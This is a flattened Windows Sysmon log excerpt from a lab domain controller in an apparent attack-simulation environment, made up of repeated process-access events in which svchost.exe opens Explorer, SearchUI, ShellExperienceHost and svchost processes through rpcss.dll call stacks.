11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 